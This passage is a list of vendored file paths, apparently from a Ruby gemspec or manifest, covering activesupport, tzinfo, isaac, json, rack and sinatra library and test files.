"vendor/activesupport/lib/active_support/core_ext/pathname/clean_within.rb",
"vendor/activesupport/lib/active_support/core_ext/proc.rb",
"vendor/activesupport/lib/active_support/core_ext/process.rb",
"vendor/activesupport/lib/active_support/core_ext/process/daemon.rb",
"vendor/activesupport/lib/active_support/core_ext/range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/blockless_step.rb",
"vendor/activesupport/lib/active_support/core_ext/range/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/range/include_range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/overlaps.rb",
"vendor/activesupport/lib/active_support/core_ext/rexml.rb",
"vendor/activesupport/lib/active_support/core_ext/string.rb",
"vendor/activesupport/lib/active_support/core_ext/string/access.rb",
"vendor/activesupport/lib/active_support/core_ext/string/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/string/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/string/filters.rb",
"vendor/activesupport/lib/active_support/core_ext/string/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/string/iterators.rb",
"vendor/activesupport/lib/active_support/core_ext/string/multibyte.rb",
"vendor/activesupport/lib/active_support/core_ext/string/starts_ends_with.rb",
"vendor/activesupport/lib/active_support/core_ext/string/xchar.rb",
"vendor/activesupport/lib/active_support/core_ext/symbol.rb",
"vendor/activesupport/lib/active_support/core_ext/time.rb",
"vendor/activesupport/lib/active_support/core_ext/time/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/time/zones.rb",
"vendor/activesupport/lib/active_support/dependencies.rb",
"vendor/activesupport/lib/active_support/deprecation.rb",
"vendor/activesupport/lib/active_support/duration.rb",
"vendor/activesupport/lib/active_support/gzip.rb",
"vendor/activesupport/lib/active_support/inflections.rb",
"vendor/activesupport/lib/active_support/inflector.rb",
"vendor/activesupport/lib/active_support/json.rb",
"vendor/activesupport/lib/active_support/json/decoding.rb",
"vendor/activesupport/lib/active_support/json/encoders/date.rb",
"vendor/activesupport/lib/active_support/json/encoders/date_time.rb",
"vendor/activesupport/lib/active_support/json/encoders/enumerable.rb",
"vendor/activesupport/lib/active_support/json/encoders/false_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/hash.rb",
"vendor/activesupport/lib/active_support/json/encoders/nil_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/numeric.rb",
"vendor/activesupport/lib/active_support/json/encoders/object.rb",
"vendor/activesupport/lib/active_support/json/encoders/regexp.rb",
"vendor/activesupport/lib/active_support/json/encoders/string.rb",
"vendor/activesupport/lib/active_support/json/encoders/symbol.rb",
"vendor/activesupport/lib/active_support/json/encoders/time.rb",
"vendor/activesupport/lib/active_support/json/encoders/true_class.rb",
"vendor/activesupport/lib/active_support/json/encoding.rb",
"vendor/activesupport/lib/active_support/json/variable.rb",
"vendor/activesupport/lib/active_support/locale/en.yml",
"vendor/activesupport/lib/active_support/memoizable.rb",
"vendor/activesupport/lib/active_support/multibyte.rb",
"vendor/activesupport/lib/active_support/multibyte/chars.rb",
"vendor/activesupport/lib/active_support/multibyte/exceptions.rb",
"vendor/activesupport/lib/active_support/multibyte/unicode_database.rb",
"vendor/activesupport/lib/active_support/option_merger.rb",
"vendor/activesupport/lib/active_support/ordered_hash.rb",
"vendor/activesupport/lib/active_support/ordered_options.rb",
"vendor/activesupport/lib/active_support/rescuable.rb",
"vendor/activesupport/lib/active_support/secure_random.rb",
"vendor/activesupport/lib/active_support/string_inquirer.rb",
"vendor/activesupport/lib/active_support/test_case.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test/unit/assertions.rb",
"vendor/activesupport/lib/active_support/testing/default.rb",
"vendor/activesupport/lib/active_support/testing/performance.rb",
"vendor/activesupport/lib/active_support/testing/setup_and_teardown.rb",
"vendor/activesupport/lib/active_support/time_with_zone.rb",
"vendor/activesupport/lib/active_support/values/time_zone.rb",
"vendor/activesupport/lib/active_support/values/unicode_tables.dat",
"vendor/activesupport/lib/active_support/vendor.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/css.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xchar.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlbase.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlevents.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlmarkup.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/backend/simple.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/exceptions.rb",
"vendor/activesupport/lib/active_support/vendor/memcache-client-1.5.1/memcache.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Algiers.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Cairo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Casablanca.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Harare.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Johannesburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Monrovia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Nairobi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/Buenos_Aires.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/San_Juan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Bogota.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Caracas.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chicago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chihuahua.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Denver.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Godthab.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Guatemala.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Halifax.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Indiana/Indianapolis.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Juneau.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/La_Paz.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Lima.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Los_Angeles.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mazatlan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mexico_City.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Monterrey.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/New_York.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Phoenix.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Regina.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Santiago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Sao_Paulo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/St_Johns.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Tijuana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Almaty.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baghdad.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baku.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Bangkok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Chongqing.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Colombo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Dhaka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Hong_Kong.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Irkutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jakarta.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jerusalem.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kabul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kamchatka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Karachi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Katmandu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kolkata.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Krasnoyarsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuala_Lumpur.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuwait.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Magadan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Muscat.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Novosibirsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Rangoon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Riyadh.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Seoul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Shanghai.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Singapore.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Taipei.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tashkent.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tbilisi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tehran.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tokyo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Ulaanbaatar.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Urumqi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Vladivostok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yakutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yekaterinburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yerevan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Azores.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Cape_Verde.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/South_Georgia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Adelaide.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Brisbane.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Darwin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Hobart.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Melbourne.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Perth.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Sydney.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Etc/UTC.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Amsterdam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Athens.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Belgrade.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Berlin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bratislava.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Brussels.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bucharest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Budapest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Copenhagen.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Dublin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Helsinki.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Istanbul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Kiev.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Lisbon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Ljubljana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/London.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Madrid.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Minsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Moscow.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Paris.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Prague.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Riga.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Rome.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sarajevo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Skopje.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sofia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Stockholm.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Tallinn.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vienna.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vilnius.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Warsaw.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Zagreb.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Auckland.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Fiji.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Guam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Honolulu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Majuro.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Midway.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Noumea.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Pago_Pago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Port_Moresby.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Tongatapu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/info_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/offset_rationals.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/ruby_core_support.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/time_or_datetime.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_definition.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_offset_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_period.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_transition_info.rb",
"vendor/activesupport/lib/active_support/vendor/xml-simple-1.0.11/xmlsimple.rb",
"vendor/activesupport/lib/active_support/version.rb",
"vendor/activesupport/lib/active_support/whiny_nil.rb",
"vendor/activesupport/lib/activesupport.rb",
"vendor/isaac/LICENSE",
"vendor/isaac/README",
"vendor/isaac/TODO",
"vendor/isaac/VERSIONS",
"vendor/isaac/crypt/ISAAC.rb",
"vendor/isaac/isaac.gemspec",
"vendor/isaac/setup.rb",
"vendor/isaac/test/TC_ISAAC.rb",
"vendor/json/CHANGES",
"vendor/json/GPL",
"vendor/json/README",
"vendor/json/RUBY",
"vendor/json/Rakefile",
"vendor/json/TODO",
"vendor/json/VERSION",
"vendor/json/benchmarks/benchmark.txt",
"vendor/json/benchmarks/benchmark_generator.rb",
"vendor/json/benchmarks/benchmark_parser.rb",
"vendor/json/benchmarks/benchmark_rails.rb",
"vendor/json/bin/edit_json.rb",
"vendor/json/bin/prettify_json.rb",
"vendor/json/data/example.json",
"vendor/json/data/index.html",
"vendor/json/data/prototype.js",
"vendor/json/ext/json/ext/generator/extconf.rb",
"vendor/json/ext/json/ext/generator/generator.c",
"vendor/json/ext/json/ext/generator/unicode.c",
"vendor/json/ext/json/ext/generator/unicode.h",
"vendor/json/ext/json/ext/parser/extconf.rb",
"vendor/json/ext/json/ext/parser/parser.c",
"vendor/json/ext/json/ext/parser/parser.rl",
"vendor/json/ext/json/ext/parser/unicode.c",
"vendor/json/ext/json/ext/parser/unicode.h",
"vendor/json/install.rb",
"vendor/json/lib/json.rb",
"vendor/json/lib/json/Array.xpm",
"vendor/json/lib/json/FalseClass.xpm",
"vendor/json/lib/json/Hash.xpm",
"vendor/json/lib/json/Key.xpm",
"vendor/json/lib/json/NilClass.xpm",
"vendor/json/lib/json/Numeric.xpm",
"vendor/json/lib/json/String.xpm",
"vendor/json/lib/json/TrueClass.xpm",
"vendor/json/lib/json/add/core.rb",
"vendor/json/lib/json/add/rails.rb",
"vendor/json/lib/json/common.rb",
"vendor/json/lib/json/editor.rb",
"vendor/json/lib/json/ext.rb",
"vendor/json/lib/json/json.xpm",
"vendor/json/lib/json/pure.rb",
"vendor/json/lib/json/pure/generator.rb",
"vendor/json/lib/json/pure/parser.rb",
"vendor/json/lib/json/version.rb",
"vendor/json/tests/fixtures/fail1.json",
"vendor/json/tests/fixtures/fail10.json",
"vendor/json/tests/fixtures/fail11.json",
"vendor/json/tests/fixtures/fail12.json",
"vendor/json/tests/fixtures/fail13.json",
"vendor/json/tests/fixtures/fail14.json",
"vendor/json/tests/fixtures/fail18.json",
"vendor/json/tests/fixtures/fail19.json",
"vendor/json/tests/fixtures/fail2.json",
"vendor/json/tests/fixtures/fail20.json",
"vendor/json/tests/fixtures/fail21.json",
"vendor/json/tests/fixtures/fail22.json",
"vendor/json/tests/fixtures/fail23.json",
"vendor/json/tests/fixtures/fail24.json",
"vendor/json/tests/fixtures/fail25.json",
"vendor/json/tests/fixtures/fail27.json",
"vendor/json/tests/fixtures/fail28.json",
"vendor/json/tests/fixtures/fail3.json",
"vendor/json/tests/fixtures/fail4.json",
"vendor/json/tests/fixtures/fail5.json",
"vendor/json/tests/fixtures/fail6.json",
"vendor/json/tests/fixtures/fail7.json",
"vendor/json/tests/fixtures/fail8.json",
"vendor/json/tests/fixtures/fail9.json",
"vendor/json/tests/fixtures/pass1.json",
"vendor/json/tests/fixtures/pass15.json",
"vendor/json/tests/fixtures/pass16.json",
"vendor/json/tests/fixtures/pass17.json",
"vendor/json/tests/fixtures/pass2.json",
"vendor/json/tests/fixtures/pass26.json",
"vendor/json/tests/fixtures/pass3.json",
"vendor/json/tests/runner.rb",
"vendor/json/tests/test_json.rb",
"vendor/json/tests/test_json_addition.rb",
"vendor/json/tests/test_json_fixtures.rb",
"vendor/json/tests/test_json_generate.rb",
"vendor/json/tests/test_json_rails.rb",
"vendor/json/tests/test_json_unicode.rb",
"vendor/json/tools/fuzz.rb",
"vendor/json/tools/server.rb",
"vendor/rack/AUTHORS",
"vendor/rack/COPYING",
"vendor/rack/KNOWN-ISSUES",
"vendor/rack/RDOX",
"vendor/rack/README",
"vendor/rack/Rakefile",
"vendor/rack/SPEC",
"vendor/rack/bin/rackup",
"vendor/rack/contrib/rack_logo.svg",
"vendor/rack/example/lobster.ru",
"vendor/rack/example/protectedlobster.rb",
"vendor/rack/example/protectedlobster.ru",
"vendor/rack/lib/rack.rb",
"vendor/rack/lib/rack/adapter/camping.rb",
"vendor/rack/lib/rack/auth/abstract/handler.rb",
"vendor/rack/lib/rack/auth/abstract/request.rb",
"vendor/rack/lib/rack/auth/basic.rb",
"vendor/rack/lib/rack/auth/digest/md5.rb",
"vendor/rack/lib/rack/auth/digest/nonce.rb",
"vendor/rack/lib/rack/auth/digest/params.rb",
"vendor/rack/lib/rack/auth/digest/request.rb",
"vendor/rack/lib/rack/auth/openid.rb",
"vendor/rack/lib/rack/builder.rb",
"vendor/rack/lib/rack/cascade.rb",
"vendor/rack/lib/rack/commonlogger.rb",
"vendor/rack/lib/rack/conditionalget.rb",
"vendor/rack/lib/rack/content_length.rb",
"vendor/rack/lib/rack/deflater.rb",
"vendor/rack/lib/rack/directory.rb",
"vendor/rack/lib/rack/file.rb",
"vendor/rack/lib/rack/handler.rb",
"vendor/rack/lib/rack/handler/cgi.rb",
"vendor/rack/lib/rack/handler/evented_mongrel.rb",
"vendor/rack/lib/rack/handler/fastcgi.rb",
"vendor/rack/lib/rack/handler/lsws.rb",
"vendor/rack/lib/rack/handler/mongrel.rb",
"vendor/rack/lib/rack/handler/scgi.rb",
"vendor/rack/lib/rack/handler/swiftiplied_mongrel.rb",
"vendor/rack/lib/rack/handler/thin.rb",
"vendor/rack/lib/rack/handler/webrick.rb",
"vendor/rack/lib/rack/head.rb",
"vendor/rack/lib/rack/lint.rb",
"vendor/rack/lib/rack/lobster.rb",
"vendor/rack/lib/rack/methodoverride.rb",
"vendor/rack/lib/rack/mime.rb",
"vendor/rack/lib/rack/mock.rb",
"vendor/rack/lib/rack/recursive.rb",
"vendor/rack/lib/rack/reloader.rb",
"vendor/rack/lib/rack/request.rb",
"vendor/rack/lib/rack/response.rb",
"vendor/rack/lib/rack/session/abstract/id.rb",
"vendor/rack/lib/rack/session/cookie.rb",
"vendor/rack/lib/rack/session/memcache.rb",
"vendor/rack/lib/rack/session/pool.rb",
"vendor/rack/lib/rack/showexceptions.rb",
"vendor/rack/lib/rack/showstatus.rb",
"vendor/rack/lib/rack/static.rb",
"vendor/rack/lib/rack/urlmap.rb",
"vendor/rack/lib/rack/utils.rb",
"vendor/rack/test/cgi/lighttpd.conf",
"vendor/rack/test/cgi/test",
"vendor/rack/test/cgi/test.fcgi",
"vendor/rack/test/cgi/test.ru",
"vendor/rack/test/spec_rack_auth_basic.rb",
"vendor/rack/test/spec_rack_auth_digest.rb",
"vendor/rack/test/spec_rack_auth_openid.rb",
"vendor/rack/test/spec_rack_builder.rb",
"vendor/rack/test/spec_rack_camping.rb",
"vendor/rack/test/spec_rack_cascade.rb",
"vendor/rack/test/spec_rack_cgi.rb",
"vendor/rack/test/spec_rack_commonlogger.rb",
"vendor/rack/test/spec_rack_conditionalget.rb",
"vendor/rack/test/spec_rack_content_length.rb",
"vendor/rack/test/spec_rack_deflater.rb",
"vendor/rack/test/spec_rack_directory.rb",
"vendor/rack/test/spec_rack_fastcgi.rb",
"vendor/rack/test/spec_rack_file.rb",
"vendor/rack/test/spec_rack_handler.rb",
"vendor/rack/test/spec_rack_head.rb",
"vendor/rack/test/spec_rack_lint.rb",
"vendor/rack/test/spec_rack_lobster.rb",
"vendor/rack/test/spec_rack_methodoverride.rb",
"vendor/rack/test/spec_rack_mock.rb",
"vendor/rack/test/spec_rack_mongrel.rb",
"vendor/rack/test/spec_rack_recursive.rb",
"vendor/rack/test/spec_rack_request.rb",
"vendor/rack/test/spec_rack_response.rb",
"vendor/rack/test/spec_rack_session_cookie.rb",
"vendor/rack/test/spec_rack_session_memcache.rb",
"vendor/rack/test/spec_rack_session_pool.rb",
"vendor/rack/test/spec_rack_showexceptions.rb",
"vendor/rack/test/spec_rack_showstatus.rb",
"vendor/rack/test/spec_rack_static.rb",
"vendor/rack/test/spec_rack_thin.rb",
"vendor/rack/test/spec_rack_urlmap.rb",
"vendor/rack/test/spec_rack_utils.rb",
"vendor/rack/test/spec_rack_webrick.rb",
"vendor/rack/test/testrequest.rb",
"vendor/sinatra/AUTHORS",
"vendor/sinatra/CHANGES",
"vendor/sinatra/LICENSE",
"vendor/sinatra/README.rdoc",
"vendor/sinatra/Rakefile",
"vendor/sinatra/compat/app_test.rb",
"vendor/sinatra/compat/application_test.rb",
"vendor/sinatra/compat/builder_test.rb",
"vendor/sinatra/compat/custom_error_test.rb",
"vendor/sinatra/compat/erb_test.rb",
"vendor/sinatra/compat/events_test.rb",
"vendor/sinatra/compat/filter_test.rb",
"vendor/sinatra/compat/haml_test.rb",
"vendor/sinatra/compat/helper.rb",
"vendor/sinatra/compat/mapped_error_test.rb",
"vendor/sinatra/compat/pipeline_test.rb",
"vendor/sinatra/compat/public/foo.xml",
"vendor/sinatra/compat/sass_test.rb",
"vendor/sinatra/compat/sessions_test.rb",
"vendor/sinatra/compat/streaming_test.rb",
"vendor/sinatra/compat/sym_params_test.rb",
